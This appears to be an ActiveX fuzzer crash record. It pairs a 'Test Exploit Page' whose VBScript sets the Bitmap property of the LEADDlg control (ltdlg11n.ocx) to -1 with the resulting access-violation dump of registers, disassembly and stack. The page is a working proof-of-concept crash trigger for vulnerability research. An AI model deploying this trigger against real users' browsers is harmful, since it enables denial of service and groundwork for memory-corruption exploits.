<html>
Test Exploit Page
<object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx"
prototype  = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid     = "LEADDlgLib.LEADDlg"
argCount   = 1

arg1=-1

target.Bitmap = arg1

</script>

Exception Code: ACCESS_VIOLATION
Disasm: AA62D2 CMP DWORD PTR [EAX],6461656C

Seh Chain:
--------------------------------------------------
1  73352960  VBSCRIPT.dll
2  7C839AD8  KERNEL32.dll

Called From                   Returns To                   
--------------------------------------------------

Registers:
--------------------------------------------------
EIP 00AA62D2
EAX 00000000
EBX 7C80FF22 -> A868146A
ECX 02AB2128 -> 00000000
EDX 00150608 -> 7C97E5A0
EDI 02AB2128 -> 00000000
ESI 02AB1F58 -> 00AB07C0
EBP FFFFFFFF
ESP 0013ED98 -> 00AA6292

Block Disassembly:
--------------------------------------------------
AA62BE POP EBX
AA62BF RETN 8
AA62C2 PUSH DWORD PTR [ESP+4]
AA62C6 CALL [AB00EC]
AA62CC MOV ECX,[ESP+8]
AA62D0 MOV [ECX],EAX
AA62D2 CMP DWORD PTR [EAX],6461656C   <--- CRASH
AA62D8 JE SHORT 00AA62DF
AA62DA AND DWORD PTR [ECX],0
AA62DD JMP SHORT 00AA62E2
AA62DF MOV EAX,[EAX+8]
AA62E2 RETN 8
AA62E5 PUSH ESI
AA62E6 MOV ESI,[ESP+8]
AA62EA LEA ECX,[ESI-60]

Stack Dump:
--------------------------------------------------
13ED98 92 62 AA 00 FF FF FF FF 28 21 AB 02 00 00 00 00  [.b..............]
13EDA8 AC 60 1A 00 CC ED 13 00 C0 07 AB 00 D9 5C 13 77  [.`...........\.w]
13EDB8 58 1F AB 02 FF FF FF FF 00 EE 13 00 B0 A0 B1 02  [X...............]
13EDC8 C0 ED 13 00 5C EE 13 00 E8 62 13 77 58 1F AB 02  [....\....b.wX...]
13EDD8 60 00 00 00 04 00 00 00 0A 00 00 00 01 00 00 00  [`...............]

ApiLog
--------------------------------------------------

***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)